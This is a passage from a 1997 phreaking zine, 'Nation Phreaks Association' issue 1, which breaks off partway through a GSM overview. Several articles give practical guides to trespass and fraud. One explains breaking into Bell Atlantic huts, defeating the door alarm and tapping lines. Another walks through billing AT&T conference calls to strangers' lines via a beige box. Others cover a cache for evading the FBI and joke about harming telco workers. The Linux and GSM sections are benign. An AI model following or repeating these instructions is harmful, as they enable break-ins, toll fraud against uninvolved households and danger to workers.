home *** CD-ROM | disk | FTP | other *** search
/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / texts / boxes / TRASH / npa1.txt < prev    next >
Text File  |  1998-01-27  |  84KB  |  1,729 lines

  1.         
  2.  
  3.                   Nation Phreaks Association Presents:
  4.  
  5.                   ************************************
  6.                 *      __     _       _______      __  *
  7.                *      /|  \  /| |    /| _____ |   /|  \ *
  8.                *     | |   \| | |   | | |___/ |  | |   \ *
  9.                *     | | |\ \ | |   | | _____/   | | |\ \ *
  10.                *     | | | \ \| |   | | |___/    | |  _  \ *
  11.                *     | | |\ \   |   | | |        | | | \  \ *
  12.                *     | |_| \ \__|   | |_|        | |_|\ \__\ *
  13.                *     |/__/  \/__/   |/__/        |/__/ \/__/  *
  14.            ************************************************ 
  15.                             (AsciI art by KoSmoS)
  16.                    A zine thats not full of shit
  17.  
  18. Opening Message From SKaLaR109 109(founder of NPA)
  19.  
  20.     There are times when the seriousness of a certain situation may forgo you to 
  21. Become very hateful toward the world therefor causing you to have no care or 
  22. take no responsibilities for what you have done or do. This scenario is true in almost 
  23. all aspects of life. Perhaps you obtained your interest in the arts of H/P, by means of this
  24. way.
  25. Maybe not. The Government along with various monopolies, such as Bell (by the way
  26. they claim not to be), Microsoft (speaks for itself), and Apple, (HAHA yeah fucking right)
  27. wish to Feed us lies about the state of our world and countries today. These Lies have a
  28. Name.
  29. That name is Conventional Wisdom. Everyday we are Fed lies. Lies about who we are.
  30. Lies about what we have achieved, About the past. History is written by those that conquer.
  31. Those that conquer are not always those that we can trust. Although we may have marveled
  32. at that great day in the 1960's when Man first Set Foot on A Hollywood Stage, and claimed
  33. it to be one small step for man, We still have Hungry families and homeless that wish to be
  34. considered mankind. Why do we ridicule those that are less fortunate. Why do we Fl0at
  35. around
  36. in a fucking Space station that doesnÆt work while there are children that need to be fed and
  37. mothers
  38. that need medical attention. Why The fuck do we Put people like Mitnick in jail when there
  39. are people
  40. that have babies and kill them by shoving toilet paper in their mouth and only get 1 1/2 years
  41. in jail
  42. for it. Do you see what I am saying. While Telco sits back and charges a arm and leg for
  43. services that
  44. should be free another child dies from starvation. While The Government spends Millions of
  45. dollars on
  46. bullshit encryption programs and flying wonders, another man dies from the pneumonia
  47. because he didnÆt have
  48. insurance so he couldnÆt go to the hospital. WHY the FUCK Should I have to pay for higher
  49. Education?
  50. I Say Fuck The Assholes that sit back and Get Rich off of Meaningless shit. Are we not
  51. entitled to education
  52. or knowledge? Are we not entitled to talk to whom we want when we please? therefor I say
  53. to you fellow 
  54. Hackers and Phreakers. Fuck the Government And Telc0. Obtain all you can and how you
  55. can. If you Have the
  56. Skillz to Then DO SO. You Must realize though that stupidity is not the key. The Key is
  57. Knowledge. And if 
  58. you Carefully do what you do you will not be penalized. Leave the trace of a f00l and pay
  59. the consequences.
  60. Finally I say to you... READ and READ like youÆve never before. Do not Be afraid to spend
  61. money on anything that
  62. will be a source of Knowledge to you (in other words donÆt steal Books). The authors
  63. deserve the money.
  64.  In this Zine you will Find Useful information on how to survive in This World as a Hacker
  65. And Phreak Please use this information Wisely. 
  66. My last words to you are Go and Learn for Knowledge is Power. 
  67.  
  68. IMPORTANT NOTE!!! THIS ZINE HAS BEEN DIVIDED INTO A CERTAIN FORMAT... YOU WILL FIND BEGINERS FILES TOWARD
  69. THE BEGINING OF THIS ZINE UNDER SECTION I. AND MORE TECHNICAL AND NON BEGINNER 
  70. ORIENTATED FILES TOWARD THE END UNDER SECTION II. 
  71.  
  72.  
  73.                                                    SKaLaR109/NPA 97
  74.  
  75.  
  76. Opening Message From King Lazuras(Editor of NPA)
  77.  
  78. Hey, I'm King Lazuras, editor, were a little late on this. My fault 
  79. completely.  Well, this should be a pretty good first issue. It doesn't
  80. have a red box issue like most new zines do, which I am quite happy about.
  81. Hell, you probably will actually learn from this. I have read many zines in 
  82. the past, and know most of them don't have more then 3 words of proper 
  83. English, and the rest is K-R4D 31337!!!<!>!  So, we decided that this is 
  84. going to be semi-correct. Not totally(after all, I am just some stupid
  85. little phreak....) but I will try.
  86.  
  87. INDEX:
  88.  
  89. 1. Shout Outs
  90.     a. From SKaLaR109 109    
  91.     b. From Aardwolf
  92.     c. From King Lazuras
  93.     
  94. 2. Writers/Editors/Other Important People List
  95.  
  96.        **********************SECTION I*******************
  97.                            (Beginner Files)
  98.                        
  99. 3. Articles 
  100.     a. Bell Huts                   By    Kosmos
  101.  
  102.     b. Setting Up An Emergency Kit      By      Aardwolf
  103.  
  104.     c. Linux: A Beginners Tutorial
  105.        Part 1: Basic Information        By    BurntToad 
  106.  
  107.     d. Conference Set-Up              By    Madk0w
  108.  
  109.     e. Bell And Other Telco Trucks     By    Aardwolf
  110.                         
  111.        ********************Section II****************
  112.                          (AdvanCeD FilEZ) 
  113.     
  114.       a. THE IN'S AND OUT'S OF GSM Part1  by    Master_y0da
  115.  
  116.       b. EQUIBELL-ALT P DICTIONARY        by    KoSmoS                  
  117.     
  118.       c. Advanced CGI Explotation...      by    IsolationX
  119.       
  120.       d. Octel Systems                    by    De-Format
  121.  
  122.       e. My Unix Port Hand Book           by    Master_y0da
  123.  
  124.       f. Using a Guest Lynx Account       by    Electric_Nectar
  125.  
  126.       g. URL Of The Month                 by    SKaLaR109
  127.       
  128.       
  129.  
  130. 4.    Closing Ceremonies            
  131.  
  132.                 SHOUT OUTS
  133.             ____________________________
  134.  
  135. From SKaLaR109 109:
  136.  
  137. I'd like to give a shout out to all the H/P community because
  138. we are all equal, My Mommy , and Clarity who is the important lady in my life.
  139.  
  140. From Aardwolf:
  141.  
  142. NONE
  143.     
  144. From King Lazuras:
  145.  
  146. 2600        (I have met most of the 2600 crowd, even)
  147.             (though they probably don't remember me.)
  148.         (Emanuel might 'cause I got him annoyed    )
  149.         ('cause I talk to fast...( I do...)     )
  150.  
  151. Pam        (she knows who she is, she rocks)
  152.  
  153. Wolfgame    (he knows who he is to (and he drove me to dinner  )
  154.         (a bunch of times after 2600 meetings)           )
  155.  
  156. Iggy        ('cause he was the first person)
  157.             (to actually remember me as Laz and not king)
  158.             (and he knows who he is to.)
  159.  
  160. My IRC Buddies--
  161. IsolationX
  162. delphian
  163. ultram(he is gonna yell for me putting his name here)
  164. de-format
  165.  
  166.  
  167.  
  168. --A LOT OF OTHER PEOPLE!!!!--
  169. (To many people to list...Besides, not sure if anyone would    )
  170. (want to be associated with me.   :)                )
  171.  
  172.  
  173.         Writers/Editors/Other Important People List
  174.     ___________________________________________________________
  175.                                                    AdminIstration
  176. 1. SKaLaR109 109    --    The Cool Dude That Started NPA(Founder)
  177. 2. Aardwolf    --    Cool Dude That Does Sooo Much, But Nothing Specific
  178. 3. King Lazuras --    Chief Editor(not such a cool dude, just me)
  179.  
  180.           NPA/Writing Staff and a Damn Good one might I add
  181.  
  182.  
  183. Collins
  184. Hotwire           
  185. Madk0w            
  186. Hype              
  187. Sun_Fed_Darkness  
  188. X-Human           
  189. A_Clockwork_Orange        
  190. Master Yoda
  191. Kosmos
  192. TheViking
  193. NivFreak
  194. De-Format
  195. BurntToad
  196. IsolationX
  197. Info234
  198. Electric Nectar
  199. Heyitsme
  200. Technics
  201. Krazy_Tunez
  202. Kalony
  203. Strykereye
  204.  
  205.                                                 
  206.  
  207.  
  208.                           Articles
  209.                     _________________________
  210.                    
  211.  
  212. A.
  213.  
  214.  
  215.             
  216.  
  217.  
  218.                             BELL ATLANTIC HUTS                             
  219.                             __________________                             
  220.                                     By                         
  221.             
  222.                            Kosmos                                                                           
  223.     
  224.                            1997
  225.  
  226. INTRODUCTION
  227. ------------
  228.      Almost all of us have been in the situation were we say, is there not a
  229. challenge.  Well first your too cocky, and second, no.  In my area of Bell we
  230. have some thing we call a BELL HUT.  A small building made of concrete with
  231. the classic light and dark tan of bell Atlantic.  In here you will find what
  232. is in those, how not to be busted being in it, and what not to do in it.
  233.  
  234. HOW TO GET IN
  235. -------------
  236.      Your classic brute forcing is always an option, yet you do not want to
  237. leave all those scratches on the pretty bell place, so if you can kill a 
  238. bell man and get the key, or utilize that knowledge and lockpick it.
  239.  
  240. ONCE YOUR IN
  241. ------------
  242.      Getting in was your problem, now I am guessing you do not want a cop on you.
  243. well look up in the upper left hand part of the doorway (on the frame).  You
  244. see that "thing".  Well if you just opened the door it is sending signals to
  245. the CO telling them that it is open.  Not to worry though, cause you were
  246. smart and read Kosmos' file.  If you pull out the "knob" you will close off the
  247. signal.  (diagram later).  You see when the door is closed it is pushed in
  248. fully, closed(circuit), when you open it is half-way, open(circuit), when you
  249. pull it is fully open, closed (circuit).  Now your safe, from that anyway, you
  250. still need to worry about noise, being obvious, etc...
  251.  
  252. WHAT TO DO NOW YOUR SAFE
  253. ------------------------
  254.      This hut is running a good full 10-20 blocks of houses, possibly more.
  255. But do NOT touch a thing, unless having a couple thousand volts through you
  256. sounds good.  On one of the 2 long walls will be a grounder, a wrist band that
  257. will ground you so you don't fry.  Now what you do with the copper is your
  258. problem, but you can splice, clip, and there is usually a phone on the wall.
  259. Now I have also seen a Flat Box (a flat 2-3 foot tall, 1 foot wide, 3-4 in
  260. thick box) just up on the wall, if you know what your doing in there, go for
  261. it.  (on a flat, when you open it there are 2 columns of pins, grouped in
  262. 4 pins, clip to the upper most right one, go over one, down on and clip there
  263. to, bingo, dial-tone).  Anyway there are also cabinets and god knows what is
  264. in there, usually a couple manuals.  If you can take your time and glance
  265. around, I have know idea what you'll find near you.
  266.  
  267. THE KEY
  268. -------
  269.      No sorry, not the key to the hut, the key of what to do when your in.  At
  270. the copper all you will see is rows and rows of black rectangles, either fold
  271. them up or down, or open them like a cabinet, there are your wires^_^
  272.  
  273. WHAT NOT TO DO
  274. --------------
  275.      I just wanted to accent on this because I do not want to read, Phreak
  276. found Phried, in the newspaper. PLEASE DO NOT TOUCH A THING WITHOUT
  277. BEING
  278. GROUNDED!!!
  279.  
  280. TIPS
  281. ----
  282. -Have a friend sit out front with his bike like he is taking a break so he can
  283. notify you of a Telco truck coming, or something like that.
  284.  
  285. -Be paranoid, be very paranoid.
  286.  
  287. -Look, Listen, and Think.  You may be very interested at finding something I
  288. may have overlooked.  You never know.
  289.  
  290. -Remember where you are and utilize that, everyone wants a conf. be kind^_^
  291.  
  292. DIAGRAM
  293. -------                         _________
  294.                                |         |            %=Conductor
  295.                     /|_________|_________|_______     ^=On (circuit)
  296.                    |  _________ ____%____ _______|    *=Off (circuit)
  297.                     \|         | *  ^  * |
  298.                                |________ |
  299.  
  300.  
  301.  
  302. B.            
  303.  
  304.  
  305.                     Setting Up An Emergency Kit 
  306.                     ___________________________
  307.                          By 
  308.  
  309.                        Aardwolf
  310.                 
  311.                         1997
  312.  
  313. Introduction:
  314. -------------
  315.  
  316. Picture this: You were almost caught stealing car phones, you are out and
  317. do not have a kit, the FEDS are at your house, or any other emergency.
  318. What do you do? Well if you didnÆt read this file you would probably last
  319. about a week and finally get caught or die. Yet if you do read you will
  320. be prepared and would last a long time. The following file will explain
  321. the construction and setting up of an emergency kit.
  322.  
  323. How it works:
  324. -------------
  325.  
  326. Basically its a backpack or something in the woods in a tree with a waterproof
  327. cover on it that has stuff you need in it to survive. When something happens
  328. and you need it you just go to that place in the woods and get it. Then you
  329. have all the resources you put in it.
  330.  
  331. What you should have:
  332. ---------------------
  333.  
  334. -Money (doesnÆt matter how much, $20 will last a long time if you know how to)
  335. -Food (crackers or other things that are filling that do not go bad are great)
  336. -Phield Phreaking Kit (For them calls)
  337. -Change of underwear (I wonder why)
  338. -Small wool blanket or something (it does get cold)
  339. -Matches, Lighter
  340. -Flashlight
  341. -Toilette paper (or just steal it from your local 7-11's bathroom)
  342. -NPA's file on loitering, surviving, and other cool shit
  343. -Hat/beenie (20% of heat loss is through your head)
  344. -Paper, Pen (Might need em)
  345. -List of numbers, family members, loyars
  346. -Anything you think you will need or you can fit in your backpack
  347.  
  348. Placing:
  349. --------
  350.  
  351. You should put it in a place like the woods, and it should be close to
  352. somewhere you can get to easily. Just do not forget where it is!
  353.  
  354. This thing might seem dumb but you will wish you had it when you are wanted
  355. by the FBI.
  356.  
  357.  
  358.  
  359. C.
  360.  
  361.  
  362.             Linux: A Beginners Tutorial
  363.             Part 1: Basic Information
  364.             ___________________________
  365.                     By 
  366.  
  367.                 BurntToad 
  368.                 
  369.                   1997
  370.  
  371.  
  372.  
  373. 1) Basic Commands:
  374.    --------------
  375.  
  376.  
  377.     Learning Linux isn't easy but its power and 
  378.       the many ways it can be customized makes it 
  379.     worth the effort. If you think back to the 
  380.     first time you saw DOS's C: prompt, and had 
  381.     no idea what to do, you will feel that way 
  382.     the first time you see the Linux prompt; 
  383.     depending on the shell you are using the 
  384.       prompt will either be a $, a % or some other 
  385.       symbol like it, but the idea is the same.  
  386.       At this prompt you can either start up a program,
  387.       manipulate files, or configure your system.  
  388.  
  389.  
  390.  
  391. Figure 1.0
  392. -------------------------------------------------------------------------
  393. UNIX    DOS       Action                                           
  394. -------------------------------------------------------------------------
  395. ls      dir       Displays information about files and directories.
  396. cd      cd        Changes the current directory.
  397. cp      copy      Copies files from one directory to another.
  398. mv      move      Moves a file to another directory.
  399. rm      del          Removes a file.       
  400. mkdir   mkdir     Creates a new directory.
  401. rmdir   rmdir     Removes a directory.
  402. man     help      Displays help for a requested command.
  403. more    more      Displays a file pausing at the end of each screen.
  404. cat     type      Displays the contents of a file.
  405. grep    ------    Displays the lines in a file that match a given pattern.
  406. chmod   attrib    Sets permissions on files and directories.
  407. chown   ------    Change the ownership of the specified file(s).
  408. df      dir       Displays the amount of free space on the disk.
  409. wc      ------    Provides count of words, or characters in a file.
  410.  
  411.  
  412.     Fig. 1.0 shows some of the more basic UNIX 
  413.         commands. There are differences in the between 
  414.         the DOS and UNIX versions of specific commands. 
  415.         For the most part, UNIX commands have far more 
  416.         switches (options) available that their DOS 
  417.         relatives, and more are added as users demand 
  418.         them. More importantly UNIX was designed from 
  419.         the ground up as a multi-user network system, 
  420.         so commands like chmod and chown are crucial 
  421.         for security.
  422.  
  423.     The commands in Fig. 1.0 will help you get 
  424.         started but don't be surprised if you run into 
  425.         difficulties.  You'll find that some programs 
  426.         do not appear to be doing anything and others 
  427.         have a very strange command system with no menu 
  428.         to help.  The text editor vi is one; you might 
  429.         expect to load it then just start typing, but it
  430.         doesnÆt work that way. Instead, you have to press
  431.         the letter I for insert mode and then start typing.  
  432.         When it comes to saving the file, UNIX programmers 
  433.         like the more accurate term write, and they create 
  434.         their interfaces accordingly.  Manual pages might 
  435.         be meant as help, but are usually far too detailed, 
  436.         and just confuse the average user. Be careful when 
  437.         you use the rm command because when you delete a 
  438.         file it is gone forever, and can not be undeleted.
  439.  
  440.  
  441.     
  442. 2) UNIX Does Windows:
  443.    -----------------
  444.  
  445.     The X Windows System variously, called X Windows,
  446.         X Window, or just X, is the primary graphical interface 
  447.         for UNIX, and can be activated by typing startx,
  448.         or xmd. Unlike Windows 95 or NT, X Windows separates 
  449.         the base systems and the windowing system. The actual 
  450.         objects you see on the X desktop, including everything
  451.         from icons to toolbars to menus, come from a program called 
  452.         a window manager. Think of it this way: If you could completely 
  453.         replace your Windows 95 desktop with a different system of 
  454.         managing UI objects and windows designs, with only the 
  455.         core OS components running underneath, you'd be closer 
  456.         to the X Windows model.
  457.  
  458.     The most popular window manager is called fvwm, 
  459.         which is a stripped down model of twm, the powerful, 
  460.         but memory hungry window manager that comes with
  461.         X11 proper. Other window managers include mwm 
  462.         (the motif window manager), and olwm 
  463.         (Sun Microsystems' Open Look Interface). X Windows
  464.         was designed around the three button mouse son its
  465.         a good idea to have one.
  466.  
  467.  
  468. 3) Installing And Configuring X Windows
  469.  
  470.  
  471.       Getting used to X isn't a problem, but getting 
  472.         it up and running may be.  Typically, you install
  473.         it from the CD-ROM or FTP site. In Red Hat 4.1 
  474.         and Caldera OpenLinux Base, the installation is 
  475.         more or less automatic. It's one thing, however 
  476.         to copy a systems files onto your hard disk, and
  477.         yet another to make them work with your hardware.
  478.         That's where many would be Linux users give up. 
  479.         
  480.  
  481.  
  482.       Once you have it up and running, the next question 
  483.         is what you can do with it. The is , quite simply
  484.         anything. True X, wont run Windows applications,
  485.         with an emulator like WINE that is now in the making, 
  486.         but many of the more popular software is made into
  487.         a UNIX version, like Netscape Navigator, or Corel 
  488.         WordPerfect UNIX, or even DOOM.
  489.  
  490.  
  491.  
  492.         The combination of Linux and XFREE86 offers a rich,  
  493.         powerful, and complex operating system with excellent 
  494.         salability and constant new development. At first you
  495.         may find yourself back in windows more so than Linux,
  496.         and you may wonder why you used up a big chunk of
  497.         your hard disk for something you do not even use. 
  498.         Eventually you will spend more and more time in 
  499.         Linux. The fact is, together Linux and X, let 
  500.         you build a system suited precisely to your needs
  501.         and to your network, with freely available development 
  502.         tools at your disposal. You need a lot of time to learn
  503.         Linux well, but you'll find that the time was well spent.
  504.  
  505.         XFREE86 is just a version of the MIT X Window System
  506.         and is a available for System V/386, 386BSD, and 
  507.         other x86 UNIX implementations..X11R6 is just the
  508.         X Windows in UNIX.
  509.  
  510.         Any questions can be emailed to: 
  511.         BurntToad@hotmail.com        
  512.  
  513.  
  514.  
  515.  
  516. D.    
  517.  
  518.  
  519.                         Conference Set-Up  
  520.                         _________________
  521.                                By             
  522.                                              
  523.                              Madk0w 
  524.        
  525.                           1997
  526.                             
  527.  
  528.  
  529.  
  530.         In this is the first submission I've made to the NPA and IÆll be  
  531. talking about Meet-Me conferences and Dial-In Bridges, how to set them up,
  532. and methods of billing (not that we pay of course).  
  533.  
  534.  
  535.         The most popular and the most convenient conferences are of course the
  536. AT&T Dial-In bridges. These are the conferences that most everyone is familiar
  537. with. As I found out, I have more fun setting them up than actually calling 
  538. into them, but thats just me I guess.
  539.  
  540. First things first, to set up conference's you must Beige Box, or use a cotcot 
  541. I like to beige Box, because this is the most convenient way so we'll just stick
  542. with that for now.  Now I will not be explaining what a Beige is or how to make 
  543. one since there are probably more T-files on that box than any other.  You can 
  544. even find them on your local PD board.  But get your beige box and get ready to 
  545. field phreak.
  546.  
  547. This is just a suggestion but before you get out there and hook up I would 
  548. have the info and equipment you will need to set up the conference.  You don't 
  549. need alot of shit.  All you need is a Pen and a piece of paper, and maybe 
  550. something hard to write on.  I recommend a pen over a pencil for obvious 
  551. reasons.  It would not be cool to break your lead while on the phone with the 
  552. Meet-Me operator.  On the piece of paper you should write the number of the 
  553. Tele-Conference service and either your local ANI or an 800. I will post all 
  554. the number's and other information you will need to know at the end of this 
  555. article.
  556.  
  557. OK, when you have all your equipment go hook up your beige to wherever you
  558. beige from.  Now the only time I beige it's never from the same location.  
  559. Since it's usually at different times of the night, I never know if the owner 
  560. of the phone line is home or not.  So what IÆve found to work best is when 
  561. you're hooking up to your line make sure it has call waiting.  The operator 
  562. will call you back after you set up the conference and having the owner of 
  563. the phone line pick up his phone could lead to some very uncomfortable moments!
  564. You can find a line with call waiting by hitting *70 on every line until you 
  565. hear the three short dial tones. I hope everyone knows what I mean.  
  566.  
  567. Anyway, call the ANI and write the number down because the operator will 
  568. ask you what number you're calling from, this is how they bill the number.  
  569. Next call the Tele-conference service and set up your meet-MEÆs. The rest is 
  570. basically talking with the operator and bullshitting her (or BullSHit as 
  571. Visionary would say).  I'm not gonna tell you what to say to her.  I mean it 
  572. might take you a couple of try's before you know what to say and are 
  573. convincing enough, but I will tell you this, keep it short and simple. 
  574. As Dead Kat and I have found out, it's easier to just say:  "I need six 
  575. conference's set for the 1st,2nd,3rd,etc.. of December... from 6pm to 2:00am 
  576. EST.. and I want to bill them to the number I'm calling from..."   There's no
  577. need to make one call for every conference.  Oh, and I almost forgot, she will 
  578. ask you how many ports you want.  What she means is how many lines in do you 
  579. want.  You can have up to 20 ports, but I would not recommend this at all.  
  580. Twenty people on a conference tends to make it hard to talk to anyone. I would 
  581. say no more than ten, maybe 15 if you know a shit load of people will call, but 
  582. ten should do the trick.
  583.  
  584. As soon as you hang up with her, dial a number that you know will ring and 
  585. that will let you stay on for a few minutes. A good example is a VMB with a 
  586. long greet or maybe a number that just rings forever I use 1-800-777-8854 
  587. just because I don't like the people that work there. Stay on the line until 
  588. you hear the call waiting beep and just click over.  When you answer, the op 
  589. will tell you the pin's and numbers for the conferences.
  590.  
  591. Just work with what you have, you probably will have your own style and what
  592. not, but let me mention this, the op will give you a "Host PIN".  This is
  593. for the person who set it up and no one else.  Just some advice, don't call 
  594. the conference direct and use this code.  You'll end up paying for the meet-me.
  595.  
  596. Well it's easy.  All you need is a beige box, a place to beige, and the 800
  597. number.  Here are the numbers for the ATT conference's.  These numbers are 
  598. basically the same, you can call either one and set them up.
  599.           
  600.         1-800-232-1111 -AT&T Conference Set-up
  601.         1-800-544-6363 -AT&T Conference Set-up
  602.         0-700-456-1000 -AT&T's Alliance Teleconferencing
  603.         0-700-456-2000 -AT&T's Alliance Teleconferencing
  604.         1-800-544-6363 -AT&T's Alliance Teleconferencing
  605.         1-800-366-2663 -Sprint Teleconference
  606.       1-800-487-9240 -ANI
  607.       1-800-444-4444 -press 1 and wait for ANI
  608.  
  609.     
  610. Next issue of NPA IÆll tell you how to set up a conference using
  611. Worldvox.
  612.  
  613.  
  614. And I thought IÆd give you a little bit of info...
  615.  
  616.     I called AT&T Conference Set-up # and the price per minute is about 
  617. .55 cents a minute per line plus a 15.00 setup fee, so after the conference
  618. add up the approx. amount of people that were on and how long the conference
  619. was up for and find out how much of a bill it is.  I'm sure the people who's 
  620. house you beige from won't be happy when they get there $1000+ bill.  Heh!
  621.  
  622.  
  623.  
  624. E.
  625.  
  626.  
  627.                    Bell and other Telco Trucks 
  628.                  ___________________________
  629.                              By 
  630.                 
  631.                         Aardwolf
  632.         
  633.                           1997
  634.  
  635. Introduction:
  636. -------------
  637.  
  638. Telco trucks. We all know and love them... As we all know they come in many
  639. flavors and colors but who really really understands them? What is in them?
  640. What is  their gas mailing. And how the hell do they drive them pieces of shit.
  641. The above questions may or may not be answered in this file so do not blink
  642. and eat your corn.
  643.  
  644. Telco Van:
  645. ----------
  646.  
  647. Dodge Ram 2500. Comes in white, gray, and green and gray (1970's)
  648. Used by a wide variety of bell guys (Install, Repair, Splices)
  649. Contain common equipment including shovels and manuals.
  650. Have yellow flashy light on roof. Very common.
  651.  
  652. Telco Car:
  653. ----------
  654.  
  655. Gray and white. Have simple equipment (test set and some tools)
  656. Used by CO-Tech and Engineers. May make home visits but mainly
  657. for business use. Does not have yellow flashy light on roof.
  658. Not very common. Usually found around COÆs and sometimes truck yards.
  659.  
  660. Telco Truck:
  661. ------------
  662.  
  663. White or gray. Used by some of the other bell guys. Usually emergency
  664. vehicles for if a cable is cut or digging. May or may not have test set
  665. depending on area. Manuals and maps. And picks, axÆs, and shovels.
  666. Good amount of em but not as common as vans. Do have yellow flashy thingy.
  667.  
  668. Telco Bucket Truck
  669. ------------------
  670.  
  671. Very cool trucks. Just about as common as normal trucks depending on the
  672. area. These suckers have a crane with a large bucket in em. They have
  673. common equipment (testset, shovels, etc....) Bell uses these suckers for
  674. working on Arial lines. Only the true linemen use these, Not the install
  675. and repair or other guys. These guys have been with Telco for a while and
  676. know what they are doing. They are usually white or gray like normal trucks.
  677. They do have a flashy yellow thingy, and alot of equipment like road cones,
  678. umbrellas, and lots of Arial cable and shit.
  679.  
  680. Telco Armored Trucks:
  681. ---------------------
  682.  
  683. These trucks are funky looking. They look like a banks armored car but are
  684. bells. I have  only seen white ones. Whey have front windows and thats it. They
  685. are shaped like a hi-tech ambulance. They carry ladders and have a yellow
  686. flashy thingy. They have the common equipment, along with digging tools like
  687. mad! They have cabinets on the sides (locked :() which have tools up the
  688. bunghole. They also can be used as mobile bell bases. These are very
  689. uncommon and are mostly by bell huts or manholes. If you see one put that
  690. sledge hammer to use. :)
  691.  
  692. Telco Trailer:
  693. --------------
  694.  
  695. This is a trailer that hooks on to the back of Telco trucks and vans. They
  696. use these when they go in manholes. They are used to provide the lineman
  697. inside with power, light, and flier out the methane gasses. They are only
  698. found when bell's in the manholes. WouldnÆt it be fun to turn it off while a
  699. lineman is in the vault? hehehe....
  700.  
  701.            *********************Section II**********************
  702.  
  703. A.
  704.  
  705.  THE IN'S AND OUT'S OF GSM Part 1
  706. by (\/)@ster Y0d@
  707. mastyoda@concentric.net
  708.  
  709.  
  710.  
  711.     During the early 1980s, analog cellular telephone systems were experiencing rapid growth in Europe,
  712. particularly in Scandinavia and the United Kingdom, but also in France and Germany.  Each country
  713. developed its own system, which was incompatible with everyone else's in equipment and operation. 
  714. This was an undesirable situation, because not only was the mobile equipment limited to operation
  715. within national boundaries, which in a unified Europe were increasingly unimportant, but there was a
  716. very limited market for each type of equipment, so economies of scale, and the subsequent savings,
  717. could not be realized. 
  718.  
  719. The Europeans realized this early on, and in 1982 the Conference of European Posts and Telegraphs
  720. (CEPT) formed a study group called the Groupe Spécial Mobile (GSM) to study and develop a
  721. pan-European public land mobile system.  The proposed system had to meet certain criteria: 
  722.  
  723.      good subjective speech quality, 
  724.  
  725.      low terminal and service cost, 
  726.  
  727.      support for international roaming, 
  728.  
  729.      ability to support handhald terminals, 
  730.  
  731.      support for range of new services and facilities, 
  732.  
  733.      spectral efficiency, and 
  734.  
  735.      ISDN compatibility. 
  736.  
  737. In 1989, GSM responsibility was transferred to the European Telecommunication Standards Institute
  738. (ETSI), and phase I of the GSM specifications were published in 1990.  Commercial service was
  739. started in mid-1991, and by 1993 there were 36 GSM networks in 22 countries, with 25 additional
  740. countries having already selected or considering GSM [DS93].  This is not only a European
  741. standard - South Africa, Australia, and many Middle and Far East countries have chosen GSM.  By
  742. the beginning of 1994, there were 1.3 million subscribers worldwide [Nil].  The acronym GSM now
  743. (aptly) stands for Global System for Mobile telecommunications. 
  744.  
  745. The developers of GSM chose an unproven (at the time) digital system, as opposed to the
  746. then-standard analog cellular systems like AMPS in the United States and TACS in the United
  747. Kingdom.  They had faith that advancements in compression algorithms and digital signal processors
  748. would allow the fulfillment of the original criteria and the continual improvement of the system in terms
  749. of quality and cost.  The 8000 pages of the GSM recommendations try to allow flexibility and
  750. competitive innovation among suppliers, but provide enough guidelines to guarantee the proper
  751. interworking between the components of the system.  This is done in part by providing descriptions
  752. of the interfaces and functions of each of the functional entities defined in the system. 
  753.  
  754. 2  Services provided by GSM 
  755.  
  756. References: [Har93a, Har93b, DS93, FR93, LM92, Hub92] 
  757.  
  758. >From the beginning, the planners of GSM wanted ISDN compatibility in services offered and control
  759. signalling used.  The radio link imposed some limitations, however, since the standard ISDN bit rate
  760. of 64 kbps could not be practically achieved. 
  761.  
  762. Using the ITU-T definitions, telecommunication services can be divided into bearer services,
  763. teleservices, and supplementary services.  The digital nature of GSM allows data, both synchronous
  764. and asynchronous, to be transported as a bearer service to or from an ISDN terminal.  Data can use
  765. either the transparent service, which has a fixed delay but no guarantee of data integrity, or a
  766. non-transparent service, which guarantees data integrity through an Automatic Repeat Request
  767. (ARQ) mechanism, but with a variable delay.  The data rates supported by GSM are 300 bps, 600
  768. bps, 1200 bps, 2400 bps, and 9600 bps [Har93a]. 
  769.  
  770. The most basic teleservice supported by GSM is telephony. There is an emergency service, where
  771. the nearest emergency-service provider is notified by dialling three digits (similar to 911).  Group 3
  772. fax, an analog method described in ITU-T recommendation T.30 [Har93b], is also supported by use
  773. of an appropriate fax adaptor.  A unique feature of GSM compared to older analog systems is the
  774. Short Message Service (SMS).  SMS is a bidirectional service for sending short alphanumeric (up to
  775. 160 bytes) messages in a store-and-forward fashion.  For point-to-point SMS, a message can be
  776. sent to another subscriber to the service, and an acknowledgement of receipt is provided to the
  777. sender.  SMS can also be used in a cell-broadcast mode, for sending messages such as traffic
  778. updates or news updates.  Messages can be stored in the SIM card for later retrieval [Bal93]. 
  779.  
  780. Supplementary services are provided on top of teleservices or bearer services, and include features
  781. such as caller identification, call forwarding, call waiting, multi-party conversations, and barring of
  782. outgoing (international) calls, among others. 
  783.  
  784.       
  785.  
  786. 3  Architecture of the GSM network 
  787.  
  788. References: [DS93, FR93, B+93, LM92, Hub92, Rah93, SK93] 
  789.  
  790. A GSM network is composed of several functional entities, whose functions and interfaces are
  791. defined.  Figure 1 shows the layout of a generic GSM network.  The GSM network can be divided
  792. into three broad parts. The Mobile Station is carried by the subscriber, the Base Station Subsystem
  793. controls the radio link with the Mobile Station.  The Network Subsystem, the main part of which is
  794. the Mobile services Switching Center, performs the switching of calls between the mobile and other
  795. fixed or mobile network users, as well as management of mobile services, such as authentication. 
  796. Not shown is the Operations and Maintenance center, which oversees the proper operation and
  797. setup of the network.  The Mobile Station and the Base Station Subsystem communicate across the
  798. Um interface, also known as the air interface or radio link.  The Base Station Subsystem
  799. communicates with the Mobile service Switching Center across the A interface. 
  800.  
  801. 3.1  Mobile Station
  802.  
  803. The mobile station (MS) consists of the physical equipment, such as the radio transceiver, display and
  804. digital signal processors, and a smart card called the Subscriber Identity Module (SIM).  The SIM
  805. provides personal mobility, so that the user can have access to all subscribed services irrespective of
  806. both the location of the terminal and the use of a specific terminal.  By inserting the SIM card into
  807. another GSM cellular phone, the user is able to receive calls at that phone, make calls from that
  808. phone, or receive other subscribed services. 
  809.  
  810. The mobile equipment is uniquely identified by the International Mobile Equipment Identity (IMEI). 
  811. The SIM card contains the International Mobile Subscriber Identity (IMSI), identifying the
  812. subscriber, a secret key for authentication, and other user information.  The IMEI and the IMSI are
  813. independent, thereby providing personal mobility.  The SIM card may be protected against
  814. unauthorized use by a password or personal identity number. 
  815.  
  816. 3.2  Base Station Subsystem 
  817.  
  818. The Base Station Subsystem is composed of two parts, the Base Transceiver Station (BTS) and the
  819. Base Station Controller (BSC).  These communicate across the specified A-bis interface, allowing
  820. (as in the rest of the system) operation between components made by different suppliers. 
  821.  
  822. The Base Transceiver Station houses the radio tranceivers that define a cell and handles the radio-link
